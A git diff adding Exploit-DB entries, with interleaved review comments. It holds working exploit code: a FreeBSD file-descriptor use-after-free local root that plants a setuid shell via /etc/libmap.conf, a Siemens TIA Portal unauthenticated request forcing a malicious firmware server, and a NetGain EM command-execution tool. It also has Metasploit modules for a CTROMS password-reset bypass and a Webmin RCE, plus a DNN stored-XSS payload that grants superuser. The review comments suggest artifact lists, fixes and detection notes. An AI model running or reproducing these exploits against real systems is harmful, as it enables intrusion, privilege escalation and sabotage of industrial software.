Could not create all hammer threads, will try though!\n"); + } +} + +void fire() { + int i, j, fd, fd2, bytes_rec, server_socket; + int sv[2], fds[2], hammer_socket[NUM_FORKS]; + int *fd_ptr; + char socket_path[256], sync_buf[3], buf[256]; + pthread_t write_thread, trigger_thread, monitor_thread; + pthread_t hammer_threads[NUM_THREADS]; + pid_t pids[NUM_FORKS]; + socklen_t len; + struct thread_data thread_data; + struct sockaddr_un server, client; + struct sockaddr_un hammer_socket_addr[NUM_FORKS]; + + // Socket for receiving thread status + unlink(SERVER_PATH); + prepare_domain_socket(&server, SERVER_PATH); + server_socket = bind_domain_socket(&server); + + // Sockets to receive hammer signal + for (i = 0; i < NUM_FORKS; i++) { + snprintf(socket_path, sizeof(socket_path), "%s%c", SERVER_PATH, '1'+i); + unlink(socket_path); + prepare_domain_socket(&hammer_socket_addr[i], socket_path); + hammer_socket[i] = bind_domain_socket(&hammer_socket_addr[i]); + } + + strncpy(sync_buf, "1\n", 3); + len = sizeof(struct sockaddr_un); + + if (socketpair(PF_UNIX, SOCK_STREAM, 0, sv) == -1) { + perror("[!] socketpair"); + exit(1); + } + + pthread_mutex_init(&write_mtx, NULL); + pthread_mutex_init(&trigger_mtx, NULL); + pthread_cond_init(&write_cond, NULL); + pthread_cond_init(&trigger_cond, NULL); + + pthread_create(&monitor_thread, NULL, monitor_dirty_buffers, NULL); + + prepare(sv, fds); + fd = fds[0]; + fd2 = fds[1]; + + thread_data.fd = fd; + thread_data.fd2 = fd2; + pthread_create(&trigger_thread, NULL, trigger_uaf, (void *) &thread_data); + pthread_create(&write_thread, NULL, write_to_file, (void *) &thread_data); + + for (j = 0; j < NUM_FORKS; j++) { + if ((pids[j] = fork()) < 0) { + perror("[!] 
fork"); + abort(); + } + else if (pids[j] == 0) { + pthread_mutex_init(&hammer_mtx, NULL); + pthread_cond_init(&hammer_cond, NULL); + + close(fd); + close(fd2); + + /* Prevent that a file stream in the hammer threads + * gets the file descriptor of fd for debugging purposes + */ + if ((fd = open_tmp("/tmp/dummy")) == -1) + perror("[!] dummy"); + if ((fd2 = open_tmp("/tmp/dummy2")) == -1) + perror("[!] dummy2"); + printf("[+] Fork %d fd: %d\n", j, fd); + printf("[+] Fork %d fd2: %d\n", j, fd2); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_create(&hammer_threads[i], NULL, hammer, NULL); + } + + printf("[+] Fork %d created all threads\n", j); + + if ((bytes_rec = recvfrom(hammer_socket[j], + buf, 256, 0, + (struct sockaddr *) &client, + &len)) == -1) { + perror("[!] accept"); + abort(); + } + + pthread_cond_broadcast(&hammer_cond); + + for (i = 0; i < NUM_THREADS; i++) { + pthread_join(hammer_threads[i], NULL); + } + + pthread_cond_destroy(&hammer_cond); + pthread_mutex_destroy(&hammer_mtx); + + exit(0); + } else { + printf("[+] Created child with PID %d\n", pids[j]); + } + } + + read_thread_status(server_socket); + printf("[+] Send signal to Start Hammering\n"); + for (i = 0; i < NUM_FORKS; i++) { + if (sendto(hammer_socket[i], + sync_buf, + strlen(sync_buf), 0, + (struct sockaddr *) &hammer_socket_addr[i], + sizeof(hammer_socket_addr[0])) == -1) { + perror("[!] 
sendto"); + exit(1); + } + } + + pthread_join(monitor_thread, NULL); + for (i = 0; i < NUM_FORKS; i++) { + kill(pids[i], SIGKILL); + printf("[+] Killed %d\n", pids[i]); + } + + pthread_join(write_thread, (void **) &fd_ptr); + pthread_join(trigger_thread, NULL); + + pthread_mutex_destroy(&write_mtx); + pthread_mutex_destroy(&trigger_mtx); + pthread_cond_destroy(&write_cond); + pthread_cond_destroy(&trigger_cond); + + printf("[+] Returned fd: %d\n", *fd_ptr); + prevent_panic(sv, *fd_ptr); + + // fd was acquired from write_to_file + // which allocs a pointer for it + free(fd_ptr); +} + +int main(int argc, char **argv) +{ + setbuf(stdout, NULL); + + fire(); + + return 0; +} + +EOF + +cc -o heavy_cyber_weapon -lpthread heavy_cyber_weapon.c + +cat > program.c << EOF +#include +#include +#include +#include + +void _init() +{ + if (!geteuid()) + execl("/bin/sh","sh","-c","/bin/cp /bin/sh /tmp/xxxx ; /bin/chmod +xs /tmp/xxxx",NULL); +} + +EOF + +cc -o program.o -c program.c -fPIC +cc -shared -Wl,-soname,libno_ex.so.1 -o libno_ex.so.1.0 program.o -nostartfiles +cp libno_ex.so.1.0 /tmp/libno_ex.so.1.0 + +echo "[+] Firing the Heavy Cyber Weapon" +./heavy_cyber_weapon +su + +if [ -f /tmp/xxxx ]; then + echo "[+] Enjoy!" + echo "[+] Do not forget to copy ./libmap.conf back to /etc/libmap.conf" + /tmp/xxxx +else + echo "[!] FAIL" +fi \ No newline at end of file diff --git a/exploits/hardware/remote/47083.py b/exploits/hardware/remote/47083.py new file mode 100755 index 000000000..2102db624 --- /dev/null +++ b/exploits/hardware/remote/47083.py 
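Review bot: The header comment of 47081.sh names the advisory and the author but does not list what the script changes on the host, which is the first thing a lab operator or an incident responder needs from this entry. From the visible lines it copies `/etc/libmap.conf` to the working directory, has the helper write a `libutil.so.9 /tmp/libno_ex.so.1.0` mapping into `/etc/libmap.conf`, installs `/tmp/libno_ex.so.1.0`, and leaves a setuid copy of `/bin/sh` at `/tmp/xxxx`; the only clean-up hint is the final echo about restoring libmap.conf. I would add a header line such as `# Artifacts: rewrites /etc/libmap.conf; creates /tmp/libno_ex.so.1.0, /tmp/xxxx (setuid sh), /tmp/pwn, /tmp/pwn2, /tmp/sync_forks*, /tmp/dummy* - remove after testing`. A second line, `# Fix: apply the FreeBSD-SA-19:02.fd patch`, would state the remediation next to the advisory name that is already there.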
@@ -0,0 +1,51 @@ +## +# Exploit Title: Siemens TIA Portal unauthenticated remote command execution +# Date: 06/11/2019 +# Exploit Author: Joseph Bingham +# CVE : CVE-2019-10915 +# Vendor Homepage: www.siemens.com +# Software Link: https://new.siemens.com/global/en/products/automation/industry-software/automation-software/tia-portal.html +# Version: TIA Portal V15 Update 4 +# Tested on: Windows 10 +# Advisory: https://www.tenable.com/security/research/tra-2019-33 +# Writeup: https://medium.com/tenable-techblog/nuclear-meltdown-with-critical-ics-vulnerabilities-8af3a1a13e6a +# Affected Vendors/Device/Firmware: +# - Siemens STEP7 / TIA Portal +## + +## +# Example usage +# $ python cve_2019_10915_tia_portal_rce.py +# Received '0{"sid":"ZF_W8SDLY3SCGExV9QZc1Z9-","upgrades":[],"pingInterval":25000,"pingTimeout":60000}' +# Received '40' +# Received '42[" ",{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":0},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":""},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":""},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},null]' +## + +import websocket, ssl, argparse + +parser = argparse.ArgumentParser() +parser.add_argument("target_host", help="TIA Portal host") +parser.add_argument("target_port", help="TIA Portal port (ie. 
8888)", type=int) +parser.add_argument("(optional) update_server", help="Malicious firmware update server IP") +args = parser.parse_args() + +host = args.target_host +port = args.target_port +updatesrv = args.update_server +ws = websocket.create_connection("wss://"+host+":"+port+"/socket.io/?EIO=3&transport=websocket&sid=", sslopt={"cert_reqs": ssl.CERT_NONE}) +# Read current proxy settings +#req = '42["cli2serv",{"moduleFunc":"ProxyModule.readProxySettings","data":"","responseEvent":" "}]' +# Change application proxy settings +#req = '42["cli2serv",{"moduleFunc":"ProxyModule.saveProxyConfiguration","data":{"configType":{"key":"ProxyConfigType","defaultValue":0,"value":1},"proxyAddress":{"key":"ProxyAddress","defaultValue":"","value":"10.0.0.200"},"proxyPort":{"key":"ProxyPort","defaultValue":"","value":"8888"},"userName":{"key":"ProxyUsername","defaultValue":"","value":""},"password":{"key":"ProxyPassword","defaultValue":"","value":""}},responseEvent":" "}]' +# Force a malicious firmware update +req = 42["cli2serv",{"moduleFunc":"SoftwareModule.saveUrlSettings","data":{"ServerUrl":"https://"+updatesrv+"/FWUpdate/","ServerSource":"CORPORATESERVER","SelectedUSBDrive":"\\","USBDrivePath":"","downloadDestinationPath":"C:\\Siemens\\TIA Admin\\DownloadCache","isMoveDownloadNewDestination":true,"CyclicCheck":false,"sourcePath":"C:\\Siemens\\TIA Admin\\DownloadCache","productionLine":"ProductionLine1","isServerChanged":true},"responseEvent":" "}]' +ws.send(req) + +result = ws.recv() +print("Received '%s'" % result) + +result = ws.recv() +print("Received '%s'" % result) + +result = ws.recv() +print("Received '%s'" % result) \ No newline at end of file diff --git a/exploits/ios/local/47409.txt b/exploits/ios/local/47409.txt new file mode 100644 index 000000000..2719c6cf9 --- /dev/null +++ b/exploits/ios/local/47409.txt 
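Review bot: The header block of 47083.py gives the affected build (`# Version: TIA Portal V15 Update 4`) but nothing on the fixed release or on what to look for on a host, so a reader cannot tell from the entry whether an installation is still exposed. The example output and the request in the body show that the socket.io endpoint answers without authentication and that `SoftwareModule.saveUrlSettings` changes `ServerUrl` and `ServerSource`, so an unexpected change to the update-server setting is the observable effect. I would add two header lines, `# Fix: see the Tenable advisory above for the fixed release` and `# Indicator: update ServerUrl/ServerSource changed without an administrator action`. The fixed version itself is not on this page and should be taken from the advisory rather than guessed.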
@@ -0,0 +1,18 @@
+Exploit Title: SockPuppet 3
+Date: September 8, 2019
+Exploit Author: Umang Raghuvanshi
+Vendor Homepage: https://apple.com
+Software Link: https://ipsw.me/
+Version: iOS 11.0—12.2, iOS 12.4
+Tested on: iOS 11.0—12.2, iOS 12.4
+CVE: CVE-2019-8605
+
+This is an alternative (and complete) exploit for CVE-2019-8605. I have only implemented the exploit and do not claim any rights for discovering and/or publishing the vulnerability. The actual exploit code is in “SockPuppet3.cpp”, other files are either helpers or documentation. This exploit [1] has already been verified in production several times [2] [3], however, I can assist in additional verification if required.
+
+POC:
+
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/47409.zip
+
+[1] https://gist.github.com/ur0/a9b2d8088479a70665f729c4e9bf8720
+[2] https://twitter.com/Pwn20wnd/status/1163392040073191426
+[3] https://twitter.com/electra_team/status/1163658714840047618
\ No newline at end of file
diff --git a/exploits/jsp/webapps/47391.go b/exploits/jsp/webapps/47391.go
new file mode 100755
index 000000000..00b08b4a7
--- /dev/null
+++ b/exploits/jsp/webapps/47391.go
@@ -0,0 +1,71 @@ +/******************************************************************************** +# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthorized Local File Inclusion +# Date: 15 September 2019 +# Exploit Author: azams / @TheRealAzams +# Vendor Homepage: http://netgain-systems.com +# Software Link: http://www.netgain-systems.com/free/ +# Version: v10.1.68 +# Tested on: Linux +# +# Install golang: https://golang.org/doc/install +# Compile exploit: go build exploit.go +# Run exploit without compiling: go run exploit.go +# Shouts: Rix, Channisa, Ridho7ul & Horangi! +*********************************************************************************/ +package main + +import ( + "crypto/tls" + "fmt" + "io/ioutil" + "net/http" + "net/url" + "os" + "strings" +) + +var ( + target string + port string + cmd string +) + +func main() { + for i := range os.Args { + if os.Args[i] == "-u" { + target = os.Args[i+1] + } else if os.Args[i] == "-p" { + port = os.Args[i+1] + } else if os.Args[i] == "-cmd" { + cmd = os.Args[i+1] + } + } + if target != "" || port != "" || cmd != "" { + cmd = "type=sh&content=%232Fbin%2Fsh%0Aecho+'0xdeadnoob'%0a" + cmd + "%0aecho+'0xdeadnoob'&args=&count=0&ip=localhost" + status, body := exploit() + if strings.Contains(status, "200") { + fmt.Println("Status Code: " + status) + result := strings.Split(body, "0xdeadnoob") + fmt.Println("Result: \n" + strings.Trim(result[1], "\n")) + return + } + fmt.Println("Exploit failed!") + } else { + fmt.Println("Usage: ./exploit -u http://127.0.0.1 -p 8181 -cmd 'id;'") + } +} + +func exploit() (string, string) { + tbTransport := &http.Transport{TLSClientConfig: &tls.Config{InsecureSkipVerify: true}} + client := &http.Client{Transport: tbTransport} + datas, err := url.ParseQuery(cmd) + req, err := http.NewRequest("POST", target+":"+port+"/u/jsp/designer/script_test.jsp", strings.NewReader(datas.Encode())) + req.Header.Set("Content-type", "application/x-www-form-urlencoded") + resp, err := client.Do(req) 
+ if err != nil { + panic(err) + } + defer resp.Body.Close() + body, _ := ioutil.ReadAll(resp.Body) + return resp.Status, string(body) +} \ No newline at end of file diff --git a/exploits/linux/dos/44994.html b/exploits/linux/dos/44994.html new file mode 100644 index 000000000..900743d93 --- /dev/null +++ b/exploits/linux/dos/44994.html @@ -0,0 +1,30 @@ +# Exploit Title: Tor Browser - Use After Free (PoC) +# Date: 09.07.2018 +# Exploit Author: t4rkd3vilz +# Vendor Homepage: https://www.torproject.org/ +# Software Link: https://www.torproject.org/download/download-easy.html.en +# Version: Tor 0.3.2.x before 0.3.2.10 +# Tested on: Kali Linux +# CVE : CVE-2018-0491 + +#Run exploit, result DOS + + + + +veryhandsome jameel naboo + + \ No newline at end of file diff --git a/exploits/linux/remote/48196.txt b/exploits/linux/remote/48196.txt new file mode 100644 index 000000000..5b8bcfe56 --- /dev/null +++ b/exploits/linux/remote/48196.txt 
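Review bot: The title in the header comment of 47391.go, "Unauthorized Local File Inclusion", does not match what the code does, and anyone triaging by title will under-rate the entry. `main` builds a `type=sh&content=...` body around the `-cmd` argument and `exploit` posts it to `/u/jsp/designer/script_test.jsp` with no credentials, then prints what comes back between the two markers, which is unauthenticated command execution rather than file inclusion. I would retitle it `# Exploit Title: NetGain EM Plus <= v10.1.68 - Unauthenticated Remote Command Execution` and keep the matching row in files_exploits.csv in step. For detection, the entry could also say that unauthenticated POSTs to `script_test.jsp` are the request to alert on.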
@@ -0,0 +1,131 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpClient + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'CTROMS Terminal OS - Port Portal "Password Reset" Authentication Bypass' , + 'Description' => %q{ + This module exploits an authentication bypass in CTROMS, triggered by password reset verification code disclosure. + In order to exploit this vulnerability, the username must be known. + Exploiting this vulnerability create a new password for the user you specified and present it to you. + + The "verification code" and "cookie generate" functions required to reset the password contain vulnerability. + When the "userId" parameter is posted to "getverificationcode.jsp", a verification code is transmitted to the account's phone number for password reset. + But this verification code written in the database is also reflected in the response of the request. + The first vector would be to use this verification code. + The second vector is the "rand" cookie values returned in this request. These values are md5. + If these values are assigned in the response, password reset can be done via these cookie values. 
+ Ex: [ Cookie: 6fb36ecf2a04b8550ba95603047fe85=fae0bKBGtKBKtKh.wKA.vLBmuLxmuM.; 34d1c350632806406ecc517050da0=b741baa96686a91d4461145e40a9c2df ] + }, + 'References' => + [ + [ 'CVE', '' ], + [ 'URL', 'https://www.pentest.com.tr/exploits/CTROMS-Terminal-OS-Port-Portal-Password-Reset-Authentication-Bypass.html' ], + [ 'URL', 'https://www.globalservices.bt.com' ] + ], + 'Author' => + [ + 'Özkan Mustafa AKKUŞ ' # Discovery & PoC & MSF Module @ehakkus + ], + 'License' => MSF_LICENSE, + 'DisclosureDate' => "March 2 2020", + 'DefaultOptions' => { 'SSL' => true } + )) + + register_options( + [ + Opt::RPORT(443), + OptString.new('USERNAME', [true, 'Username']), + OptString.new('PASSWORD', [true, 'Password for the reset', Rex::Text.rand_text_alphanumeric(12)]) + ]) + end + + def peer + "#{ssl ? 'https://' : 'http://' }#{rhost}:#{rport}" + end + + def check + begin + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{Rex::Text.rand_text_alphanumeric(8)}" + }) + rescue + return Exploit::CheckCode::Unknown + end + + if res.code == 200 and res.body.include? '"rand"' + return Exploit::CheckCode::Appears + end + + return Exploit::CheckCode::Safe + end + + def run + unless Exploit::CheckCode::Appears == check + fail_with(Failure::NotVulnerable, 'Target is not vulnerable.') + end + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getuserinfo.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}" + }) + + if res.code == 200 and res.body.include? '"mobileMask"' + print_good("Excellent! 
password resettable for #{datastore["USERNAME"]}") + else + fail_with(Failure::NotVulnerable, 'The user you specified is not valid') + end + + begin + + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getverificationcode.jsp'), + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}" + }) + + @cookie = res.get_cookies + + res = send_request_cgi({ + 'method' => 'POST', + 'ctype' => 'application/x-www-form-urlencoded', + 'uri' => normalize_uri(target_uri.path, 'getresult.jsp'), + 'cookie' => @cookie, + 'headers' => + { + 'Referer' => "#{peer}/verification.jsp" + }, + 'data' => "userId=#{datastore["USERNAME"]}&password=#{datastore["PASSWORD"]}" + }) + if res.body.include? 'result":10' + print_good("boom! Password successfully reseted.") + print_good("Username : #{datastore["USERNAME"]}") + print_good("Password : #{datastore["PASSWORD"]}") + else + fail_with(Failure::BadConfig, "Unknown error while resetting the password. Response: #{res.code}") + end + end + end +end \ No newline at end of file diff --git a/exploits/linux/webapps/47330.rb b/exploits/linux/webapps/47330.rb new file mode 100755 index 000000000..a5857537a --- /dev/null +++ b/exploits/linux/webapps/47330.rb 
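Review bot: The `'References'` list in `initialize` carries `[ 'CVE', '' ]`, an empty identifier that tools indexing the module will record as a CVE reference with no value; drop the line until an id is assigned. The file is also committed as `exploits/linux/remote/48196.txt` although it is a Ruby Metasploit module, while the other module in this commit is stored as `47330.rb`, so syntax-aware scanners and searches by extension will miss it. `'DisclosureDate' => "March 2 2020"` likewise differs from the `'2019/08/30'` form used in 47330.rb, and one format should be used for both. The description already names the server-side cause, the verification code being reflected in the `getverificationcode.jsp` response; a closing sentence that the fix is to stop returning the code and the `rand` cookies would make the entry usable for remediation.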
@@ -0,0 +1,170 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Remote + Rank = ExcellentRanking + + include Msf::Exploit::Remote::HttpClient + + def initialize(info={}) + super(update_info(info, + 'Name' => "Webmin < 1.930 Remote Code Execution", + 'Description' => %q{ + This exploit takes advantage of a code execution issue within the function + unserialise_variable() located in web-lib-funcs.pl, in order to gain root. + The only prerequisite is a valid session id. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'James Bercegay', # Vulnerability Discovery + ], + 'References' => + [ + [ 'URL', 'https://www.gulftech.org/' ] + ], + 'Privileged' => false, + 'Payload' => + { + 'DisableNops' => true + }, + 'Platform' => ['unix'], + 'Arch' => ARCH_CMD, + 'Targets' => [ ['Automatic', {}] ], + 'DisclosureDate' => '2019/08/30', + 'DefaultTarget' => 0)) + + register_options( + [ + OptString.new('WMPORT', [ true, "Webmin port", '10000']), + OptString.new('WMUSER', [ true, "Webmin username", 'test']), + OptString.new('WMPASS', [ true, "Webmin password", 'test']), + ]) + end + + def check + + # Set Webmin port + datastore['RPORT'] = datastore['WMPORT'] + + # Verbose + print_status("Attempting to login") + + # Send login request + res = send_request_cgi( + { + 'uri' => '/session_login.cgi', + 'method' => 'POST', + 'vars_post' => + { + 'user' => datastore['WMUSER'], + 'pass' => datastore['WMPASS'], + 'save' => '1' + }, + 'cookie' => "redirect=1; testing=1; sessiontest=1;" + }) + + # If succesful cookie will be set + if ( res and res.headers['Set-Cookie'] ) + # Do we have a valid SID? 
+ if ( /sid=/.match(res.headers['Set-Cookie']) ) + # Extract the SID + sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1] + print_good("Login was successful") + else + # No dice + print_bad("Unable to login") + return Exploit::CheckCode::Safe + end + else + # No dice + print_bad("Unexpected response") + return Exploit::CheckCode::Safe + end + + # Verbose + print_status("Checking if host is vulnerable") + + # Try to execute arbitrary code + res = send_request_cgi({ + 'uri' => '/rpc.cgi', + 'method' => 'POST', + 'headers' => + { + 'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + }, + 'data' => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"', + 'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid + }) + + # If it works our custom Content-Type will be set + if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" ) + # Good + return Exploit::CheckCode::Vulnerable + else + # Bad + return Exploit::CheckCode::Safe + end + end + + def exploit + + # Set Webmin port + datastore['RPORT'] = datastore['WMPORT'] + + # Verbose + print_status("Attempting to login") + + # Send login request + res = send_request_cgi( + { + 'uri' => '/session_login.cgi', + 'method' => 'POST', + 'vars_post' => + { + 'user' => datastore['WMUSER'], + 'pass' => datastore['WMPASS'], + 'save' => '1' + }, + 'cookie' => "redirect=1; testing=1; sessiontest=1;" + }) + + # If succesful cookie will be set + if ( res and res.headers['Set-Cookie'] ) + # Do we have a valid SID? 
+ if ( /sid=/.match(res.headers['Set-Cookie']) ) + # Extract the SID + sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1] + print_good("Login was successful") + else + # No dice + print_bad("Unable to login") + return + end + else + # No dice + print_bad("Unexpected response") + return + end + + # Verbose + print_status("Sending selected payload") + + # Hex encode payload to prevent problems with the payload getting mangled + hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x') + + # Send selected payload + res = send_request_cgi({ + 'uri' => '/rpc.cgi', + 'method' => 'POST', + 'headers' => + { + 'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s + }, + 'data' => 'OBJECT CGI;`' + hex + '`', + 'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid + }) + end +end \ No newline at end of file diff --git a/exploits/multiple/webapps/47342.html b/exploits/multiple/webapps/47342.html new file mode 100644 index 000000000..2795f2f67 --- /dev/null +++ b/exploits/multiple/webapps/47342.html 
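Review bot: In `check`, the "Unable to login" and "Unexpected response" branches return `Exploit::CheckCode::Safe` although the vulnerable endpoint has not been exercised at that point, so a wrong credential or a timeout is reported as "not vulnerable" to someone auditing their own Webmin. Both branches should be `return Exploit::CheckCode::Unknown`, and the second request needs a guard before `res.headers['Content-Type']` is read, e.g. `return Exploit::CheckCode::Unknown unless res`. `check` and `exploit` also overwrite `datastore['RPORT']` with the string option `WMPORT`, which silently discards the port the operator set. Registering `Opt::RPORT(10000)` and dropping those two assignments keeps the module on the port that was actually scoped.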
@@ -0,0 +1,233 @@ +Hello, + +Please find the below vulnerability details, + +--------------------------------------------------------------------------------------------------------------------------------- + +# Exploit Title: Wolters Kluwer TeamMate+ – Cross-Site Request Forgery +(CSRF) vulnerability +# Date: 02/09/2019 +# Exploit Author: Bhadresh Patel +# Version: <= TeamMate Version 3.1 (January 2019) (Internal Version:21.0.0.0) +# CVE : CVE-2019-10253 + +This is an article with PoC exploit code for for Wolters Kluwer TeamMate+ – +Cross-Site Request Forgery (CSRF) vulnerability + +--------------------------------------------------------------------------------------------------------------------------------- + + +Title: +==== + +Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability + + +CVE: +==== + +CVE-2019-10253 + + +Date: +==== + +02/09/2019 (dd/mm/yyyy) + + +Vendor: +====== + +Wolters Kluwer is a global leader in professional information, software +solutions, and services for the health, tax & accounting, finance, risk & +compliance, and legal sectors. We help our customers make critical +decisions every day by providing expert solutions that combine deep domain +knowledge with specialized technology and services. + +Vendor link: http://www.teammatesolutions.com/about-us.aspx + + +Vulnerable Product: +============== + +TeamMate+ + +TeamMate Global Audit Solutions, part of the Tax and Accounting Division of +Wolters Kluwer, helps professionals in all industries at organizations +around the world manage audit and compliance risks and business issues by +providing targeted, configurable, and efficient software solutions. +Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate +Analytics. 
Together, this ecosystem of solutions provides organizations +with the combined assurance they need to manage all aspects of risk +identification and assessment, electronic working paper creation and +management, controls framework management, and data analysis. + + +Abstract: +======= + +Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an +attacker to upload malicious/forged files on TeamMate server or replace +existing uploaded files with malicious/forged files by enticing +authenticated user to visit attacker page. + + + +Report-Timeline: +================ + +19/03/2019: Vendor notified +19/03/2019: Vendor responded requesting further information +20/03/2019: Further technical information with PoC was shared with vendor +01/07/2019: Vendor fixed the issue in version 3.2 + + +Affected Software Version: +========================== + +<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0) + + +Exploitation-Technique: +======================= + +Remote + + +Severity Rating (CVSS): +======================= + +4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N) + +CVE ID: +======= + +CVE-2019-10253 + + +Details: +======= + +A Cross-Site Request Forgery (CSRF) vulnerability is discovered in +TeamMate+ which allows a remote attacker to modify application data (upload +malicious/forged files on TeamMate server or replace existing uploaded +files with malicious/forged files) without victim's knowledge by enticing +authenticated user to visit attacker page/URL. + +The specific flaw exists within the handling of request to +“DomainObjectDocumentUpload.ashx” application. An application failed to +validate CSRF token before handling the POST request. 
+ +Vulnerable module/page/application: +/TeamMate/Upload/DomainObjectDocumentUpload.ashx + +PoC Exploit code: +---------------------------------------------------------------------------- + + + + + + + + + +---------------------------------------------------------------------------- + +Credits: +======= + +Bhadresh Patel \ No newline at end of file diff --git a/exploits/multiple/webapps/47449.txt b/exploits/multiple/webapps/47449.txt new file mode 100644 index 000000000..461e3b3f3 --- /dev/null +++ b/exploits/multiple/webapps/47449.txt 
@@ -0,0 +1,204 @@ +/* +Exploit Title: "Display Name" Stored Unauthenticated XSS in DNN v9.3.2 +Date: 4th of July, 2019 +Exploit Author: Semen Alexandrovich Lyhin +Vendor Homepage: https://www.dnnsoftware.com/ +Software Link: https://github.com/dnnsoftware/Dnn.Platform/releases +Version: v9.3.2 +CVE : CVE-2019-13293 + +A malicious unauthenticated person can attempt to register a user with the XSS payload in "Display Name" parameter. +The administrator of the website will see a notification that a new user needs to be approved. +An administrator should click on this notification, and the JavaScript code will be executed in the administrator's browser. + +This exploit adds the user, and grants him administrator priviliges. + +A native module "module creator" also allows remote code execution. + +*/ + + + +function ApproveNotification(baseurl, id) { + return new Promise(function (resolve, reject) { + var url = baseurl + "/Activity-Feed/Messages/"; + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var post_params = "NotificationId=" + id; + var x1 = new XMLHttpRequest(); + + x1.open("POST", baseurl + "/API/InternalServices/NewUserNotificationService/Authorize"); + x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); + x1.setRequestHeader('RequestVerificationToken', token); + x1.send(post_params); + resolve(); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function MakeSuperAdmin(baseurl, id) { + return new Promise(function (resolve, reject) { + var url = baseurl + 
"/Activity-Feed/Messages/"; + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var post_params = "null" + var x1 = new XMLHttpRequest(); + + x1.open("POST", baseurl + "/API/PersonaBar/Users/UpdateSuperUserStatus?userId=" + id + "&setSuperUser=true"); + x1.setRequestHeader("Content-Type", "application/x-www-form-urlencoded; charset=utf-8"); + x1.setRequestHeader('RequestVerificationToken', token); + x1.send(post_params); + resolve(); + } + } + xhr.open('GET', url, true); + xhr.send(null); + }); +} + +function GetNotification(baseurl, username, moduleid, tabid) { + return new Promise(function (resolve, reject) { + var url = baseurl +"/dotnetnuke/Activity-Feed/Messages/" + var xhr = new XMLHttpRequest(); + xhr.onreadystatechange = function () { + if (xhr.readyState == 4) { + var data; + if (!xhr.responseType === "text") { + data = xhr.responseText; + } else if (xhr.responseType === "document") { + data = xhr.responseXML; + } else { + data = xhr.response; + } + + var parser = new DOMParser(); + var resp = parser.parseFromString(data, "text/html"); + token = resp.getElementsByName('__RequestVerificationToken')[0].value; //grab first available token + + var x1 = new XMLHttpRequest(); + + x1.open("GET", baseurl + "/API/CoreMessaging/MessagingService/Notifications?afterNotificationId=-1&numberOfRecords=1000&_=1562677665517", true); + x1.setRequestHeader('ModuleId', moduleid); + x1.setRequestHeader('TabId', tabid); + x1.onreadystatechange = () => { + + if (x1.readyState == 4) { + if (!x1.responseType === "text") { + data = x1.responseText; + } 
